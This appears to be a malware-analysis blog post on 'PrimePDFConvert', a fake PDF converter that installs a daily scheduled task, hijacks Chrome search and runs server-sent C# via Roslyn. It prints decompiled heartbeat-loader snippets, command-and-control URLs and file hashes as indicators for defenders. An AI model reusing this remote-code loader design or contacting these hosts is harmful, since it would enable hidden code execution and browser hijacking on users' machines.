PrimePDFConvert: YAPA (Yet Another PDF Application) That Turns Out to Be a Malware Loader

Earlier this week, while analyzing yet another "free PDF converter" called PrimePDFConvert, I quickly observed behavior that is very similar to PDFSupernova, a browser hijacking malware I wrote about earlier this month.

There are a few key differences in this variant however, most notable is a daily scheduled task, that runs c:\programdata\primepdfconvert.exe that "checks in", and can act as a malicious .NET loader.

The installer displays a clean, modern UI with a loading spinner, progress bars, and a lengthy EULA referencing “browser extensions” and “added search capabilities.” At first glance, it looks like a run-of-the-mill PUP (potentially unwanted program).

But underneath the surface?
It's a modular, remotely controlled malware loader with daily persistence, browser hijacking capabilities, and a Roslyn-powered remote code execution API.

Red Flags

  • Packed by Costura.Fody
  • Full screen focus during install
  • Writes daily persistence
  • Runs API Roslyn calls to load .NET code from remote servers
  • Finds Chrome, performs task kill
  • Overwrites Chrome Web Data file (search hijack points to api.fuzzsearch[.]com)
  • Doesn't install a converter (instead drops desktop shortcut to home.primepdfconvert[.]com)
  • certificate: signature:"Beyond Ideas LLC"
  • Advertiser EVERNETIX TECHNOLOGY LTD
  • The .cab download is really an AES encrypted/GZIP compressed exe that drops in programdata
Full screen focus examples below:




Network Flow from installer

hxxps://api.myprimeconfig.com/api/v1/call (remote code called)

hxxps://reppo.searchsparks.com/api/v1/report
(json response for success and potential data return)

hxxps://api.fuzzsearch.com/api/v1/get_url_lead_prime
hxxps://installmyapps.com/pupdate/zaadf/a/PrimePDFConvert.cab

hxxps://api.kennsearch.com/api/v2/heartbeat
From scheduled task: (json response for success and potential data return)

The below images are snippets of the code being remotely loaded during the install (process reaching out to api.myprimeconfig[.]com is the installer):







Scheduled task


Name: PrimePDFConvertTask
Schedule: <DaysInterval>1</DaysInterval>
Command: C:\ProgramData\PrimePDFConvert\PrimePDFConvert.exe
Arguments: <UID> (this is required to run properly)


The EXE here is initially downloaded as a .cab file (this is fake). There is a section of code running remotely from the api.myprimeconfig[.]com that unpacks this files using an AES key/IV derived from the SHA256 hash of the productID and moduleID, then decompresses it and drops it in ProgramData.

This code was shown in a previous screenshot, using this information, I was able to decrypt this, not really necessary since the file already exists in its decrypted format in ProgramData, but still noteworthy for analysis.



Chrome Profile Hijack

  • Overwrites the file "Web Data" to set all searches to go through api.fuzzsearch[.]com
  • Modifies New Tab to point to cnn.com (likely as an evasion tactic)
  • Replaces keyword table and auto-fill data
  • Tracks UID information

Task Heartbeat Analysis

From c:\programdata\PrimePDFConvert.exe:

private static void SendHeartbeat(string serverUrl, string uid, string installDate)

 
string result2 = result.Content.ReadAsStringAsync().Result;
object obj = (javaScriptSerializer.DeserializeObject(result2) as Dictionary)["data"];
string text = ((obj != null) ? obj.ToString() : null);
if (!string.IsNullOrEmpty(text))
{
Program.Start(text, uid);

Private static async Task Start(string dataValue, string uid)
SyntaxTree syntaxTree = CSharpSyntaxTree.ParseText(dataValue, null, "", null, default(CancellationToken));

This code suggests that the heartbeat can load and run arbitrary code. When I tried to run c:\programdata\primepdfconvert.exe without a commandline argument, there was not network tarffic.

When running with the proper argument shown in the scheduled task however, we do get a reply.


At this time it appears there is no data to load/execute from the server side. I decided to setup a Fiddler Auto-Response to create a file, and demonstrate this can run code.


As you can see from the response, I can pass arbitrary code through here. Hopefully some more information will come out about these types of Hijackers/Loaders, until then, happy hunting.

Additional Reading


List of related malicious file converters on SecurityMagic-Github

Indicators

Indicator Type Name Value
Domain Loader api.myprimeconfig.com/api/v1/call
Domain Loader reppo.searchsparks.com/api/v1/report
Domain Search Hijack api.fuzzsearch.com/api/v1/get_url_lead_prime
Domain Loader installmyapps.com/pupdate/zaadf/a/PrimePDFConvert.cab
Domain Heartbeat/Loader api.kennsearch.com/api/v2/heartbeat
Hash  pdfprimeconvert.exe  4e739ab1e0b0e91dda834a21f410a4c4
Hash  pdfprimeconvert.exe  ef8d55bd4ea5912df47c188c2f3a4790

Comments

Post a Comment

Popular posts from this blog

TamperedChef: Suspicious Recipe App is really Malware

Image
Hello World!  Let me introduce you to a new malware I'm calling TamperedChef .  Yesterday I came across the article Malvertising Alert: Recipe App Hijacks Credentials and Appears to Establish C&C Connection . This got me curious, so I decided to dig a bit deeper. I manually went to recipelister ( VirusTotal )  and downloaded recipelister.exe.  After reading the aforementioned blog, which observed the 7z-out folder, I figured why not use 7zip to extract recipelister.exe. Within the compressed file was app-64.7z, which I again extracted I extracted using 7zip.  At this point we have the main contents of what would appear in "AppData\Local\Temp\2w1rXpxZnwDUwuTeNvdD6FUkeI0".  Extracting app.asar: In order to extract app.asar to be easier to look at, I used this 7z asar plugin .  This is where things get interesting. When we start looking at main.js, all the while running Fiddler, we  observe a lot of suspicious code and activity.  The main.j...
Read more

EvilAI: Fake Online Speedtest Application

Image
Several Windows applications that present themselves as legitimate utilities—Internet speed testers, “manual reader” and “finder” tools, certain PDF utilities, and even some AI search frontends such as   justaskjacky   have been observed to drop a portable Node runtime folder alongside a heavily obfuscated JavaScript payload. The visible executable performs as expected to the users, however the installer also extracts the Node runtime, a scheduled task, and  an obfuscated *.js file that don’t appear necessary for the application's primary function. That JavaScript is executed by the dropped Node instance via a scheduled task (observed to run on roughly a 12-hour cycle). Its capabilities include encoded/obfuscated network communications and the potential to execute arbitrary code delivered by the server. Because the JS runs independently from the main executable and is persistent via scheduled tasks, it significantly increases the attack surface:...
Read more

New HydraSeven malware loader found in the wild

Image
Updated Nov 22, 2023 Updated notes are at the bottom of the page. Hello World! I am investigating a new malware loader and calling this unknown loader Hydra Seven . Here are some of the details. Over the past several weeks there has been some limited chatter about an interesting suspicious PDF software (pdfconverters.exe, pdfunk.exe). The first details I've run across with this were found on this twitter post https://twitter.com/neonprimetime/status/1711510658959749324 . The initial analysis suggests the malware may be related to redline through some heuristic detections from a couple security vendors. This is possible, though I haven't been able to verify Redline yet, I'm still working on it. I started digging a bit into the pdfconverters.exe, which leads to a download and install of AppData\Local\Temp\PDFunk-Setup.exe then ultiamtely AppData\Local\Programs\PDFunk\PDFunk.exe. Traffic when running PDFunk.exe shows a User-Agent that includes "PDFunk/1.0.0 ...
Read more